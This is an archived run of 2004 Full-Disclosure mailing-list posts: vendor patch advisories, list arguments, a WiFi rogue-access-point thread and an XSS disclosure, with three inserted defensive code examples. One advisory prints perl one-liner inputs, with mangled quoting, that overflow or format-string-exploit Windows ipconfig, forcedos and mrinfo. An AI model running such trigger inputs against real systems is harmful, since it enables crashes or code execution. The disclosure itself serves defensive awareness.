[Full-Disclosure] Microsoft Windows cmd line tools BOFs
Microsoft commandline tools BOFs

Product:         Windows-2000 SP4 / Windows-XP SP2
Vulnerabilities: Buffer Overflow (no privilege escalation)
Vendor:          Microsoft (http://www.microsoft.com/)
Vendor-Status:   vendor contacted (between 2002 and 2003)
Vendor-Patches:  ipconfig (XP-SP2) / forcedos.exe and mrinfo.exe not available
Objects:         ipconfig.exe / forcedos.exe / mrinfo.exe
Exploitable:     Local: PARTIAL   Remote: NO

Introduction
---

= Vulnerability Details =

1) LOCAL BUFFER OVERFLOWS / FORMAT STRING VULNERABILITY
===

OBJECTS:
ipconfig.exe (only Windows-2000 SP4)
forcedos.exe
mrinfo.exe

DESCRIPTION:
Insufficient input validation leads to a) stack-based buffer overflows and b) format string vulnerabilities.

EXAMPLES:
a) ipconfig.exe /`perl -e 'print P\x44\x33\x22\x11,%08xx13,%n;'`
b) forcedos.exe `perl -e 'print Ax6784;'`
c) mrinfo.exe -i `perl -e 'print Ax60;'`

=== GENERAL REMARKS ===
Find related postings regarding this issue here:
http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2004-10/0065.html

It is unlikely that you gain access or elevate privileges through forcedos.exe and mrinfo.exe. Nevertheless it might be possible to misuse ipconfig.exe in a restricted environment with DHCP enabled!!

Recommended Hotfixes
---

EOF @2003 [EMAIL PROTECTED], [EMAIL PROTECTED]

=== Contact ===
SEC-CONSULT UK / EUROPE
Austria / EUROPE
[EMAIL PROTECTED]
[EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] controversial shadowcrew site hacked by secret service?
Danny wrote:
> The Secret Service, or any other government enforcement agency would not condone, promote, or participate in website defacement activities. I know some of you have little faith in these agencies, but, one thing is for sure, they would never stoop this low.

Insecure replied:
> Even when the Secret Service admits that they took over the site and put up their own page, you don't believe it? Must be nice to have such blind faith in the integrity of your government enforcement agencies.

Duh... I don't know whether it's you folks who doomed us to another 4 years of hell trying to justify your own blind faith or what, but it's time you all woke up to reality. Good Morning America! Our government is no more (as) ethical as any other country. Whether it is our agents murdering a South American dictator we don't happen to like, or our agents defacing a cracker's site, it happens. Obviously you slept through the weeks of cyberwar our (paid) hackers fought with China's (paid) hackers after they downed our jet a while back. It was China who finally called a truce in their official press.

Sorry to give you people the bad news, but Bambi died a while ago. It's the wild west in 1800 and there is no law. If you want to survive, you better have a hired gun, and we go for $300/hour these days. At least those of us who have met the black hat on main street at 50 paces at high noon and walked away to tell about it.

Curt Purdy CISSP, GSEC, MCSE+I, CNE, CCDA
Information Security Engineer
DP Solutions

If you spend more on coffee than on IT security, you will be hacked. What's more, you deserve to be hacked.
-- former White House cybersecurity czar Richard Clarke
[Full-Disclosure] [SECURITY] [DSA 594-1] New Apache packages fix arbitrary code execution
Debian Security Advisory DSA 594-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                        Martin Schulze
November 17th, 2004                                    http://www.debian.org/security/faq

Package        : apache
Vulnerability  : buffer overflows
Problem-Type   : remote
Debian-specific: no
CVE ID         : CAN-2004-0940

Two vulnerabilities have been identified in the Apache 1.3 webserver:

CAN-2004-0940
    Crazy Einstein has discovered a vulnerability in the mod_include module, which can cause a buffer to be overflown and could lead to the execution of arbitrary code.

NO VULN ID
    Larry Cashdollar has discovered a potential buffer overflow in the htpasswd utility, which could be exploited when user-supplied input is passed to the program via a CGI (or PHP, or ePerl, ...) program.

For the stable distribution (woody) these problems have been fixed in version 1.3.26-0woody6.

For the unstable distribution (sid) these problems have been fixed in version 1.3.33-2.

We recommend that you upgrade your apache packages.

Upgrade Instructions

wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
    will update the internal database
apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
Debian GNU/Linux 3.0 alias woody

Source archives:
Re: [Full-Disclosure] question regarding CAN-2004-0930
Rob klein Gunnewiek wrote:
> Not completely so. Issuing the command using the client causes the wildcards to be sent to the server, where globbing is handled... that's also where the error occurs. When you mount it first and you do the 'ls' command, your local BASH (not 'ls') handles the globbing (wildcards), so it doesn't even arrive at the smb server.

Ah, now that makes sense, yes. Thanks for the explanation.

Christian.
[Full-Disclosure] WiFi question
List,

I'm an expert in nothing, so when I saw this I had to ask, as I'm sure there's someone out there that is a WiFi expert. Google has found no answer, so here goes.

Last night we saw a new access point appear. No problem, it's an ad-hoc network, so it's probably someone's machine with XP on it configured for their home W-LAN. Running Netstumbler shows more on it though. You get 2 access points showing this ESSID for a few seconds. Then you get a 3rd, then a 4th. Then the first two drop off; this repeats forever, always using a different MAC address when a new AP appears. The APs are all WEP enabled (which I can't crack cos I don't have the savvy or the tools :) ) and this goes on forever. The MACs are all from different pools (i.e. assigned to different manufacturers), so the only conclusion is that they are all spoofed MACs.

I have walked around the office and as far as I can tell it's coming from this office (the IT dept), basing that assumption on signal strength.

Anyone seen any tools that do this? I would love a little hand-held gadget that would help me find it (like the scanner in Alien!)

Answers on a post card :)

Colin.
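The pattern Colin describes (one ESSID, a stream of short-lived BSSIDs whose vendor prefixes do not match) can be picked out of a scanner log automatically. The Python below is an added example, not part of the original post or of any tool mentioned in the thread; the scan entries and MAC addresses are constructed, and only the number of distinct OUIs is used, no vendor lookup.

```python
from collections import defaultdict

# Constructed scanner log (seconds since start, ESSID, BSSID, WEP flag).
# Not real data: "HomeNet" mimics the behaviour described in the post,
# new BSSIDs keep appearing while older ones drop off, and the first three
# octets (the OUI) differ from one BSSID to the next. "Corp" is a normal AP.
SCAN_LOG = [
    (0,  "Corp",    "00:0c:41:aa:bb:01", True),
    (0,  "HomeNet", "00:0c:41:11:22:33", True),
    (0,  "HomeNet", "00:40:96:44:55:66", True),
    (5,  "Corp",    "00:0c:41:aa:bb:01", True),
    (5,  "HomeNet", "00:0c:41:11:22:33", True),
    (5,  "HomeNet", "00:40:96:44:55:66", True),
    (5,  "HomeNet", "00:02:2d:77:88:99", True),
    (10, "Corp",    "00:0c:41:aa:bb:01", True),
    (10, "HomeNet", "00:02:2d:77:88:99", True),
    (10, "HomeNet", "00:30:65:aa:bb:cc", True),
    (15, "Corp",    "00:0c:41:aa:bb:01", True),
    (15, "HomeNet", "00:30:65:aa:bb:cc", True),
    (15, "HomeNet", "00:e0:98:dd:ee:ff", True),
]


def oui(bssid):
    """The vendor-assigned prefix (first three octets) of a MAC address."""
    return bssid.lower()[:8]


def sightings(scan_log):
    """Per ESSID, map each BSSID to its (first, last) sighting time."""
    seen = defaultdict(dict)
    for t, essid, bssid, _wep in scan_log:
        first, last = seen[essid].get(bssid, (t, t))
        seen[essid][bssid] = (min(first, t), max(last, t))
    return seen


def flag_rotating_bssids(scan_log, min_bssids=3, max_lifetime=10):
    """Flag ESSIDs advertised by many short-lived BSSIDs from several OUIs.

    A real AP keeps one BSSID (or a small fixed set) for as long as it is
    powered; a beacon-spoofing tool churns through random ones. Returns
    {essid: {"bssids": n, "ouis": n, "short_lived": n}} for flagged ESSIDs.
    """
    report = {}
    for essid, bssids in sightings(scan_log).items():
        short_lived = [b for b, (first, last) in bssids.items()
                       if last - first <= max_lifetime]
        ouis = {oui(b) for b in bssids}
        if len(bssids) >= min_bssids and len(ouis) >= 2 and short_lived:
            report[essid] = {"bssids": len(bssids), "ouis": len(ouis),
                             "short_lived": len(short_lived)}
    return report


if __name__ == "__main__":
    for essid, info in flag_rotating_bssids(SCAN_LOG).items():
        print(f"{essid}: {info['bssids']} BSSIDs from {info['ouis']} OUIs, "
              f"{info['short_lived']} seen for <= 10s; looks like beacon spoofing")
```

Feeding a real Netstumbler export in the same (time, ESSID, BSSID, WEP) shape works unchanged; the thresholds are the knobs to tune against how often the scanner samples.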
Re: [Full-Disclosure] controversial shadowcrew site hacked by secret service?
[EMAIL PROTECTED] wrote on 11/16/2004 01:22:25 PM:
> On Tue, 16 Nov 2004 16:58:46 +, n3td3v [EMAIL PROTECTED] wrote:
> > The site which was hosting services, like bombs, fake ID and other terrorist stuff is now showing a defacement or replacement page showing words from the intelligence services.
> > http://www.shadowcrew.com
> > Is this fake or real? Who knows..
>
> The Secret Service, or any other government enforcement agency would not condone, promote, or participate in website defacement activities. I know some of you have little faith in these agencies, but, one thing is for sure, they would never stoop this low.

Wait, wait...are you really saying that website defacement is stooping too low for the feds? Surely you were saying that with tongue firmly in cheek, right?
[Full-Disclosure] How the hell can we CAN SPAM??
It's just getting ridiculous, not to mention what it costs all of us in the end. And might I add, it doesn't make sense. I mean, they spam selling something with no real contact but a spoofed one, or a real website to reach (most of the time).

I placed a web appliance at my workplace and catch an average of 52000 in 7 days. My ISP has spam filters, yet I still receive a number a day. Now I am also the return-to-sender because of email spoofing. I get about 40-50 returned-to-sender or can't-deliver emails (not to mention what my ISP catches). There is not a damn thing I can do about it.

Let's add to this the problem for legit companies who have this done to them and are placed on the blacklist. They are victims of this abuse that causes undue problems with their business affairs, and it backlashes to their clients. I often have to help fight for some of our clients who have been victimized this way. They are not spammers, but their addresses have been spoofed and blacklisted, and now any client who uses a spam blacklist blocks their legit address and misses their business correspondence.

As for myself, I am stuck with the pain of removing my email and setting up another one, and the pain of contacting all correspondents who have that one to change it to the new one, etc., etc.. Or I could attempt to figure out the real senders, send abuse email out and hope someone would answer and help. Doubt that would work.

Example:
_-
    Date: Wed, 17 Nov 2004 12:12:27 +
    From: Mail Delivery System [EMAIL PROTECTED]
    To: [EMAIL PROTECTED]
    Subject: Mail delivery failed: returning message to sender

    This message was created automatically by mail delivery software (Exim).

    A message that you sent could not be delivered to one or more of its
    recipients. This is a permanent error. The following address(es) failed:

      [EMAIL PROTECTED]
        unknown local-part byoder in domain bt.net

    -- This is a copy of the message, including all the headers. --

    Return-path: <[EMAIL PROTECTED]>
    Received: from [217.35.209.184] (helo=insmtp22.bt.net)
        by insmtp01.ukcore.bt.net with esmtp (Exim 3.36 #1)
        id 1CUOfh-000628-00
        for [EMAIL PROTECTED]; Wed, 17 Nov 2004 12:12:25 +
    Received: from [211.186.238.119] (helo=therightmoment.com)
        by insmtp22.bt.net with smtp (Exim 3.36 #1)
        id 1CUOTM-00043p-00
        for [EMAIL PROTECTED]; Wed, 17 Nov 2004 11:59:40 +
    Received: from fidnet.com (fidnet.com.mail5.psmtp.com [64.18.5.10])
        by therightmoment.com (Postfix) with ESMTP id 3097F4FF8C
        for <[EMAIL PROTECTED]>; Wed, 17 Nov 2004 06:09:31 -0600
    Message-ID: <[EMAIL PROTECTED]>
    From: Tickled B. Pulsar <[EMAIL PROTECTED]>
    To: Byoder <[EMAIL PROTECTED]>
    Subject: =?iso-8859-1?B?VmFyaW91cyBQaWxscywgTG93IHJhdGVzLCBtb25leWJhY2sgZ3VhcmFu?=
     =?iso-8859-1?B?dGVlISA=?=
    Date: Wed, 17 Nov 2004 06:09:31 -0600
    MIME-Version: 1.0
    Content-Type: multipart/alternative; charset=iso-8859-1; boundary==_NextPart_000_0005_DDA5806C.B53BEAE9
    X-Priority: 3
    X-MSMail-Priority: Normal
    X-Mailer: Microsoft Outlook Express 6.00.2800.1081
    X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2479.0006
___

The email message that was enclosed for these headers was a complete nonsense one, full of meaningless verbiage like:
__-
    TBODY TR TD bgColor=3d#99 height=3d22 DIV align=3dcenterSPAN class=3dstyle13Once something becomes di=
    scernible, or understandable, we no longer need to repeat it=2e We can de=
    stroy it=2e/SPAN/DIV/TD/TR/TBODY/TABLE TABLE cellSpacing=3d0 cellPadding=3d0 width=3d100% border=3d0 TBODY
__

We talk about the scare of government control. Someone then tell me who else has the power to step in and stop the viral and spam. Who else has the money to back massive countermeasures to put a stop to it all. Am I just being too critical and a doom-and-gloom user?

FYI: Yes, I have ensured that I'm not zombified. I then tested again by turning off my internet use for two days and still received returns for those days. I clean machines for things like this for a living. Thanks for asking.

Thank you,
Randall M
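The Received chain in a bounce like the one above is the only part of a backscatter message the victim can reason about, and only the hops recorded by the victim's own relays can be trusted; everything the sender wrote below them may be forged. The Python below is an added example (not from the original post): it unfolds such headers and finds the outermost trustworthy hop, assuming the victim's mail domain is bt.net as in the quoted headers. The header text is constructed from the relay names, IPs and queue ids shown above, with placeholder addresses.

```python
import re

# Constructed header block modelled on the bounce quoted above. The relay
# names, IPs and queue ids are the ones shown in the post; the addresses
# and timezone offsets are placeholders.
HEADERS = """\
Return-path: <sender@example.invalid>
Received: from [217.35.209.184] (helo=insmtp22.bt.net)
\tby insmtp01.ukcore.bt.net with esmtp (Exim 3.36 #1)
\tid 1CUOfh-000628-00
\tfor victim@bt.net; Wed, 17 Nov 2004 12:12:25 +0000
Received: from [211.186.238.119] (helo=therightmoment.com)
\tby insmtp22.bt.net with smtp (Exim 3.36 #1)
\tid 1CUOTM-00043p-00
\tfor victim@bt.net; Wed, 17 Nov 2004 11:59:40 +0000
Received: from fidnet.com (fidnet.com.mail5.psmtp.com [64.18.5.10])
\tby therightmoment.com (Postfix) with ESMTP id 3097F4FF8C
\tfor <victim@bt.net>; Wed, 17 Nov 2004 06:09:31 -0600
From: Tickled B. Pulsar <sender@example.invalid>
To: Byoder <victim@bt.net>
"""

RECEIVED_RE = re.compile(
    r"from\s+(?P<from>\S+)"            # host as recorded by the receiving MTA
    r"(?:\s+\((?P<paren>[^)]*)\))?"    # optional "(helo=... [ip] rdns)" part
    r"\s+by\s+(?P<by>\S+)", re.IGNORECASE)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
HELO_RE = re.compile(r"helo=(\S+)", re.IGNORECASE)


def unfold(raw):
    """Join RFC 2822 continuation lines (leading whitespace) onto their header."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line)
    return lines


def parse_received(value):
    """Extract connecting host, its IP, its HELO name and the receiving host."""
    m = RECEIVED_RE.search(value)
    if not m:
        return None
    text = m.group("from") + " " + (m.group("paren") or "")
    ip, helo = IP_RE.search(text), HELO_RE.search(text)
    return {"from": m.group("from").strip("[]"),
            "ip": ip.group(1) if ip else None,
            "helo": helo.group(1) if helo else None,
            "by": m.group("by").rstrip(";")}


def received_chain(raw):
    """Received headers top-down, i.e. the most recent hop first."""
    hops = []
    for line in unfold(raw):
        name, _, value = line.partition(":")
        if name.lower() == "received":
            hop = parse_received(value)
            if hop:
                hops.append(hop)
    return hops


def in_domain(host, suffix):
    host = (host or "").lower()
    return host == suffix or host.endswith("." + suffix)


def origin_hop(raw, trusted_suffix):
    """Walk down from the latest hop while the receiving host is ours.

    The first hop that one of our own relays recorded from an outside host
    is the only origin we can vouch for; every Received line below it was
    written by the sender and may be forged. Returns (hop, untrusted_hops).
    """
    hops = received_chain(raw)
    for i, hop in enumerate(hops):
        by_ours = in_domain(hop["by"], trusted_suffix)
        from_ours = in_domain(hop["from"], trusted_suffix) or in_domain(hop["helo"], trusted_suffix)
        if by_ours and not from_ours:
            return hop, hops[i + 1:]
    return None, hops


if __name__ == "__main__":
    hop, rest = origin_hop(HEADERS, "bt.net")
    print(f"origin as seen by our relays: {hop['ip']} (HELO {hop['helo']}) -> {hop['by']}")
    print(f"{len(rest)} earlier Received line(s) cannot be verified")
```

The IP returned is the one an abuse report should name; the Return-path and From addresses are exactly what the spoofing victim in the post is complaining about, and carry no weight.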
RE: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list.
In my opinion, I believe this list should be moderated for about a month or so. Just to weed the bullsh*t off.

J

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jason
Sent: Tuesday, November 16, 2004 10:20 PM
To: Eric Scher
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list.

> tell him directly Gregh [EMAIL PROTECTED]
>
> Eric Scher wrote:
> > [...]
> > No point in sticking around to watch this ship finish sinking.
[Full-Disclosure] Re: Airport x-ray software creating images of phantom weapons?
On Tue, 16 Nov 2004, Jason Coombs wrote:
> If the devices create phantoms by design, why would they not also obey commands to display arbitrary replacement images when some non-TEMPEST-hardened component is blasted with RF from within the x-ray scanning chamber?

A few years ago I met someone who worked on the development of X-ray machines. One problem in the operation of the machines is that weapons in luggage are extremely rare and it's difficult to motivate a human operator into concentrating fully on the display for months on end without ever spotting anything. They literally are looking for needles in haystacks. The machines plant images of weapons into the display in order to keep the operator alert. I suppose the system is configured in such a way that a button press will remove imaginary weapons. Operators failing to spot the imaginary weapons will fail to press the button, revealing problems in training. Normally it would be difficult to discover these problems before it's too late, as you'll never learn about real weapons that have passed through without being spotted.

I imagine that the systems are well shielded from any interference that the X-ray machine causes.

> Do such transportation security technologies really benefit from technical obscurity? Why not publish the design, specs and source code for analysis and for all to see?

I suspect the problem was either a glitch in the software or, perhaps more likely, operator error?

James
--
You're turning into a penguin. Stop it
http://jamesd.ukgeeks.co.uk/
FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
I sent this to n3td3v yesterday. Why look into the news..just go to the DOJ website...st8r to the fish's mouth. Indictment for hundreds of credit cards, UK passports, state licenses, school IDs, bank accounts...etc..

-Original Message-
From: Todd Towles
Sent: Tuesday, November 16, 2004 1:59 PM
To: 'n3td3v'
Subject: RE: [Full-Disclosure] Shadowcrew Grand Jury Indictment

http://www.usdoj.gov/usao/nj/publicaffairs/NJ_Press/files/pdffiles/firewallindct1028.pdf

-Original Message-
From: n3td3v [mailto:[EMAIL PROTECTED]
Sent: Tuesday, November 02, 2004 8:27 PM
To: Todd Towles
Subject: Re: [Full-Disclosure] Should the industry be expecting a hacker response to election results?

On Tue, 2 Nov 2004 20:07:28 -0600, Todd Towles [EMAIL PROTECTED] wrote:
> Your message would assume all hackers are for Kerry...that may not be true

True, I was really just trying to stir up opinion on the list and it kinda backfired on me.
Re: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list.
Then sign up for the ones that are moderated by other folks.. there are at least 3 copies of this list in moderated form.

-KF

Esler, Joel - Contractor wrote:
> In my opinion, I believe this list should be moderated for about a month or so. Just to weed the bullsh*t off.
>
> J
>
> [...]
Re: [Full-Disclosure] controversial shadowcrew site hacked by secret service?
On Wed, 17 Nov 2004 04:23:52 -0600, Curt Purdy [EMAIL PROTECTED] wrote:
> [...]
> Sorry to give you people the bad news, but Bambi died a while ago. It's the wild west in 1800 and there is no law. If you want to survive, you better have a hired gun and we go for $300/hour these days. At least those of us who have met the black hat on main street at 50 paces at high noon and walked away to tell about it.

1) I am not a US citizen, nor do I live in a US state, and quite frankly, I would be scared to live in a country under the control of George W. Bush.

2) Yes, it was difficult to tell that I was kidding, but notice the end of my email ...D is also a big smile.

3) I can count to three.

Yippeee ...D
[Full-Disclosure] [USN-26-1] bogofilter vulnerability
===
Ubuntu Security Notice USN-26-1                        November 17, 2004
bogofilter vulnerability
CAN-2004-1007
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

bogofilter

The problem can be corrected by upgrading the affected package to version 0.92.0-1ubuntu0.1. In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Antti-Juhani Kaijanaho discovered a Denial of Service vulnerability in bogofilter. The quoted-printable decoder handled certain Base-64 encoded strings in an invalid way which caused a buffer overflow and an immediate program abort.

The exact impact depends on the way bogofilter is integrated into the system. In common setups, the mail that contains such malformed headers is deferred by the mail delivery agent and remains in the queue, where it will eventually bounce back to the sender.

Source archives:
[Full-Disclosure] SUSE Security Announcement: xshared, XFree86-libs, xorg-x11-libs (SUSE-SA:2004:041)
__
SUSE Security Announcement

Package:                xshared, XFree86-libs, xorg-x11-libs
Announcement-ID:        SUSE-SA:2004:041
Date:                   Wednesday, Nov 17th 2004 15:00 MET
Affected products:      8.1, 8.2, 9.0, 9.1, 9.2
                        SUSE Linux Desktop 1.0
                        SUSE Linux Enterprise Server 8, 9
                        Novell Linux Desktop 1.0
Vulnerability Type:     remote system compromise
Severity (1-10):        8
SUSE default package:   yes
Cross References:       none

Content of this advisory:
1) security vulnerability resolved:
   - several integer overflows
   - out-of-bounds memory access
   - shell command execution
   - path traversal
   - endless loops
   - memory leaks
   problem description
2) solution/workaround
3) special instructions and notes
4) package location and checksums
5) pending vulnerabilities, solutions, workarounds:
   - ImageMagick
   - clamav
   - perl-MIME-Tools, perl-Archive-ZIP
   - apache / mod_include
   - apache2 / mod_SSL
6) standard appendix (further information)
__

1) problem description, brief discussion

The XPM library which is part of the XFree86/XOrg project is used by several GUI applications to process XPM image files. A source code review done by Thomas Biege of the SuSE Security-Team revealed several different kinds of bugs. The bug types are:
- integer overflows
- out-of-bounds memory access
- shell command execution
- path traversal
- endless loops

By providing a special image these bugs can be exploited by remote and/or local attackers to gain access to the system or to escalate their local privileges.

2) solution/workaround

No workaround exists to protect against these bugs.

3) special instructions and notes

Please restart the X server or switch to runlevel 3 and back to 5 to make sure every GUI application is restarted and uses the new library.

4) package location and checksums

Download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command rpm -Fhv file.rpm to apply the update.
Our maintenance customers are being notified individually. The packages are being offered for installation from the maintenance web. Smalltalk is the only package using libxpm statically. It will be available via YOU too.

x86 Platform:
Re: [Full-Disclosure] WiFi question
fake ap

http://bsdvault.net/bsdfap.txt
http://www.blackalchemy.to/project/fakeap/

-KF

[EMAIL PROTECTED] wrote:
> [...]
Re: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list.
A volunteer? ;-)

-----Original Message-----
From: Esler, Joel - Contractor [EMAIL PROTECTED]
Date: Wed, 17 Nov 2004 09:05:46
To: Jason [EMAIL PROTECTED], Eric Scher [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list.

In my opinion, I believe this list should be moderated for about a month or so. Just to weed the bullsh*t off.

J

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jason
Sent: Tuesday, November 16, 2004 10:20 PM
To: Eric Scher
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list.

tell him directly

Gregh [EMAIL PROTECTED]

Eric Scher wrote:
[...]
No point in sticking around to watch this ship finish sinking.

---
Sent via XDAII BlackBerry
[Full-Disclosure] Mailfilters or how I learned to stop worrying and love the n00bs.
Hey,

I just heard of a really cool new technology called mail-filters! It works like this:

1) You set up a rule to filter out everything you don't want to read (for instance where the topic contains "election fraud").
2) Go make some coffee, smoke a cigarette, code an exploit, whatever you want to do with all the free time you now have!

Turns out it's not new AT ALL! Every decent mailclient has been supporting it for years!! Is that cool or what!? You can even set a filter for specific people (for instance where the from line contains "Berend-Jan Wever"), so you won't have to read anything I ever send to any list again!

Cheers,
SkyLined

----- Original Message -----
From: Esler, Joel - Contractor [EMAIL PROTECTED]
To: Jason [EMAIL PROTECTED]; Eric Scher [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Wednesday, November 17, 2004 15:05
Subject: RE: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list.

[...]
RE: [Full-Disclosure] Mailfilters or how I learned to stop worrying and love the n00bs.
Nicely done Skylined.

Hey Jason, if you don't like FD... you might want to get on BugTraq, for your super-clean delayed news.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Berend-Jan Wever
Sent: Wednesday, November 17, 2004 8:59 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Mailfilters or how I learned to stop worrying and love the n00bs.

[...]
[Full-Disclosure] MDKSA-2004:132 - Updated gd packages fix integer overflows
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Mandrakelinux Security Update Advisory

Package name: gd
Advisory ID: MDKSA-2004:132
Date: November 15th, 2004
Affected versions: 10.0, 10.1, 9.2, Corporate Server 2.1

Problem Description:

Integer overflows were reported in the GD Graphics Library (libgd) 2.0.28, and possibly other versions. These overflows allow remote attackers to cause a denial of service and possibly execute arbitrary code via PNG image files with large image rows values that lead to a heap-based buffer overflow in the gdImageCreateFromPngCtx() function.

The updated packages have been patched to prevent these issues.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0990
http://www.securityfocus.com/archive/1/379382/2004-10-24/2004-10-30/0

Updated Packages:
To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is
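The allocation-size arithmetic behind this class of bug, as an added illustration that is not libgd's own code: image dimensions read from an untrusted PNG header are multiplied into heap allocation sizes, and without a wrap-around check a huge row count yields a tiny buffer. The checked version below is written from scratch in the spirit of the vendor fix (an assumption about the exact upstream code); `naive_row_table_bytes32` models a 32-bit build so the wrap is visible on any host.

```c
#include <limits.h>
#include <stdint.h>
#include <stdlib.h>

/* Added example, not libgd code. Models a 32-bit build computing the
 * row-pointer table size as sizeof(int *) * rows with no overflow check.
 * Returns the wrapped value the allocator would actually receive. */
uint32_t naive_row_table_bytes32(int sy)
{
    const uint32_t ptr_size = 4;            /* sizeof(int *) on a 32-bit build */
    return ptr_size * (uint32_t)sy;         /* wraps modulo 2^32 for large sy */
}

/* 1 if a * b does not fit in an int (or either operand is negative), else 0.
 * Division keeps the test itself free of overflow. */
int int_mul_overflows(int a, int b)
{
    if (a < 0 || b < 0) return 1;
    if (a == 0 || b == 0) return 0;
    return a > INT_MAX / b;
}

/* Allocate an sy-row by sx-column pixel buffer, rejecting any dimension pair
 * whose byte sizes would overflow before any memory is requested.
 * On success *out is the row-pointer table and 1 is returned;
 * on failure *out is NULL and 0 is returned. */
int safe_alloc_rows(int sx, int sy, int ***out)
{
    int **rows;
    int i;

    *out = NULL;
    if (sx <= 0 || sy <= 0) return 0;                          /* header sanity */
    if (int_mul_overflows((int)sizeof(int *), sy)) return 0;   /* table size */
    if (int_mul_overflows((int)sizeof(int), sx)) return 0;     /* per-row size */

    rows = calloc((size_t)sy, sizeof(int *));
    if (rows == NULL) return 0;
    for (i = 0; i < sy; i++) {
        rows[i] = calloc((size_t)sx, sizeof(int));
        if (rows[i] == NULL) {                 /* unwind partial allocation */
            while (i-- > 0) free(rows[i]);
            free(rows);
            return 0;
        }
    }
    *out = rows;
    return 1;
}

/* Release a buffer produced by safe_alloc_rows. */
void free_rows(int **rows, int sy)
{
    int i;
    if (rows == NULL) return;
    for (i = 0; i < sy; i++) free(rows[i]);
    free(rows);
}
```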
[Full-Disclosure] Click and Build eCommerce Platform Cross Site Scripting
ClickandBuild: http://apply.clickandbuild.com/

Online eCommerce platform.

Vulnerability

The vulnerability lies in the listPos variable in the script running at cashncarrion.co.uk. It does not properly secure user-inputted variables, presumably as the user is not supposed to input the variable but can do so easily through the URL. I was not able to find any other unchecked variables that are printed, but there could be more.

More information and examples can be found here: http://www.wheresthebeef.co.uk/XSS/clicknbuild.html and here: http://www.wheresthebeef.co.uk/XSS/cash.n.carrion.co.uk.html

The vendor has been informed and claims to have fixed this problem.

--
zxy_rbt2
Re: [Full-Disclosure] WiFi question
As far as handheld devices to aid you in your quest go, there are several options.

If you've got a Pocket PC around you can try ministumbler, which is basically the Pocket PC version of netstumbler. It's free and would probably do most of what you want.

If you want more and you're willing to fork out some cash (I believe it's around $3000), AirMagnet can do some really cool stuff, but it's probably overkill for you.

If you're feeling brave and can get hold of an Ipaq you can replace Windows with Familiar Linux (www.handhelds.org) and then install Kismet (www.kismetwireless.net), which is a great free WiFi detecting/sniffing utility. Kismet can even work with a GPS receiver and triangulate the location of the access point (although GPS systems don't tend to work well in buildings). This option is what I use, since I could run it on an Ipaq I picked up off Ebay cheap and it has all the features I need, plus it's free.

Laters,
Dave King
http://www.thesecure.net

[EMAIL PROTECTED] wrote:
[...]
Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
On Wed, 17 Nov 2004 09:26:12 -0600, Todd Towles [EMAIL PROTECTED] wrote:

I sent this to n3td3v yesterday. Why look into the news... just go to the DOJ website... st8r to the fish's mouth. Indictment for hundreds of credit cards, UK passports, state licenses, school IDs, bank accounts... etc.

Are we right in thinking it was the Full-Disclosure list who initially brought the shadowcrew site to the attention of the intelligence agencies? I was under that impression; where is the credit where it's due by journalists and authorities?! I don't see much mention of Shadowcrew busted after a thread post on a security mailing list about the site. Maybe I've got my facts crossed again, but yeah.

Thanks,
n3td3v
Re: [Full-Disclosure] WiFi question
I'm not 100% on this, as it could be something I've never heard of (of course). However, it sounds a lot like someone is playing with FakeAP:

- http://www.blackalchemy.to/project/fakeap/

It's not real difficult to set up and only requires a Prism chipset card (one or more) and a compatible Linux distro. It's been around for over 2 years, but hasn't been touched for about the same amount of time. See the site for more.

--
Peace.
~G

On Wed, 17 Nov 2004 13:53:07 +, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
[...]
[Full-Disclosure] Advisory 14/2004: Linux 2.x smbfs multiple remote vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

e-matters GmbH
www.e-matters.de

-= Security Advisory =-

Advisory: Linux 2.x smbfs multiple remote vulnerabilities
Release Date: 2004/11/17
Last Modified: 2004/11/17
Author: Stefan Esser [EMAIL PROTECTED]
Application: Linux 2.4 <= 2.4.27, Linux 2.6 <= 2.6.9
Severity: Several vulnerabilities within smbfs allow crashing the kernel or leaking kernel memory with the help of the smb server
Risk: Moderately Critical
Vendor Status: Vendor has released a bugfixed version.
Reference: http://security.e-matters.de/advisories/142004.html

Overview:

